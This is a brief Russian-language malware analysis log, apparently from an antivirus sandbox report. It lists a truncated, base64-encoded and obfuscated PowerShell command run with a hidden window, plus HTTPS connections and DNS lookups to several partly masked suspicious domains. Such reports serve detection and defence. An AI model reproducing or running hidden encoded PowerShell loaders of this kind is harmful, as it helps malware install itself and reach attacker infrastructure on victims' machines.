Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABUADUAbgA5AHYAYgB2AD0AKAAoACcASAB4AGgAJwArACcAdgAnACkAKwAoACcAYQAnACsAJwB4AGIAJwApACkAOwAuACgAJwBuACcAKwAnAGUAdwAtAGkAdABlAG0AJwApACAAJABFAE4AdgA6AFUAUwBlAFIAcABSAE8ARgBpAEwAZQBcAHgATQB5AE...
- 'th###atv.com':443
- 'ja#####igitalagency.com':443
- 'ma###lso.com':443
- 'yu##food.ml':443
- 'th####hlifes.com':443
- DNS ASK yu##food.ml
- DNS ASK th####hlifes.com
- DNS ASK th###atv.com
- DNS ASK ja#####igitalagency.com
- DNS ASK ma###lso.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABUADUAbgA5AHYAYgB2AD0AKAAoACcASAB4AGgAJwArACcAdgAnACkAKwAoACcAYQAnACsAJwB4AGIAJwApACkAOwAuACgAJwBuACcAKwAnAGUAdwAtAGkAdABlAG0AJwApACAAJABFAE4AdgA6AFUAUwBlAFIAcABSAE8ARgBpAEwAZQBcAHgATQB5AE...' (со скрытым окном)